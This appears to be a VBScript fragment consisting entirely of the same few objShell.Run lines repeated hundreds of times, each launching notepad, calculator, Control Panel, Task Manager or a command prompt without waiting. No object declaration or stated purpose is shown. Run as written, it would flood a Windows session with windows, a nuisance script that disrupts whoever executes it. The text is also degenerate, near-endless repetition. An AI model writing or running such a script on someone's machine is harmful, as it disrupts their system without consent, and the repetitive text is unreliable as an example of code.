objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
